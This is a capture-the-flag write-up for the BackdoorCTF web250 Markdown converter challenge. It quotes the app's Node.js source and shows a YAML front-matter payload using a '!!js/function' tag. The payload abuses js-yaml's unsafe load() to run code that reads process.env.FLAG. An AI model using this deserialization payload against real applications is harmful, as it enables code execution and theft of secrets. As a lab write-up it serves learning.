None
Templatized
BackdoorCTF - web - 250

Challenge Text

Markdown to HTML Convertor

Our special markdown convertor supports yaml-frontmatter and underscore style templating.
https://backdoor-web250.herokuapp.com/


This problem is almost identical to another BackdoorCTF web100 challenge and also povides its source code.

curl 'https://backdoor-web250.herokuapp.com/'
<html>
    <head>
        <title>Markdown to HTML Convertor</title>
        <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style>
    </head>
    <body>
        <h1>Markdown to HTML Convertor</h1>
        <form action="/convert" method="POST">
            <p>Our special markdown convertor supports yaml-frontmatter and underscore style templating.</p>
            <textarea name="markdown" rows="30" cols="70" placeholder="Enter markdown here">...</textarea>
            <br>
            <input type="submit" value="Convert!">
        </form>
        <p>Source code for this is available at https://github.com/backdoor-ctf/web250</p>
    </body>
</html>

Just like the previous problem, app.js contains a line exposing the process.env.FLAG variable which we need to expose again

// development only
if ('development' == app.get('env')) {
  app.use(express.errorHandler());
}
if(!process.env.FLAG)
{
  console.error("No flag in environment");
  process.exit(1);
}

index.js handles parsing/processing submitted content...

var md = require( "markdown" ).markdown;
var yml = require('js-yaml');
Mustache=require("mustache");

exports.index = function(req, res){
  res.sendfile("public/index.html");
};

exports.convert = function(req, res){
  var markdown = req.body.markdown;
  var yaml = '';
  var data = null;
  if(markdown.slice(0,3)==='---')
  {
    var end = markdown.indexOf('---',3);
    if(end>-1){
        yaml = markdown.slice(3,end);
        try{
          data = yml.load(yaml);
        }
        catch(e){
          res.send("Incorrect YAML");
          return;
        }
        markdown = markdown.slice(end+3);
    }
    //No closing --- were found
    else
        markdown=markdown.slice(3);
  }
  //Now we template it up:
  var content = Mustache.render(markdown, data)
  res.send(md.toHTML(content));
};

The most important line of code here is "data = yml.load(yaml);" which explains exactly how inputs are processed. A quick read through the js-yaml github popped up a very interesting description of yml.load though...



Don't mind if I do...

---
function: !!js/function >
  function foobar() {
    return process.env.FLAG;
  }
---
{{function}}

Flag: fb1f85e4f37eb3bf31141cb1dcce1caf


- Kelson (kelson@shysecurity.com)